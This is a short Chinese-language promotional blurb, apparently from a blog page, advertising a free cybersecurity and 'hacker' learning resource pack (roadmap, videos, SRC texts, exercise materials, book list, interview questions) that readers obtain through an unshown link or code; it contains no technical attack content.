优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
1.成长路线图&学习规划
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
2.视频教程
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
3.SRC&黑客文籍
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦!
4.护网行动资料
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
5.黑客必读书单
**
**
6.面试题合集
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
更多内容为防止和谐,可以扫描获取~
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取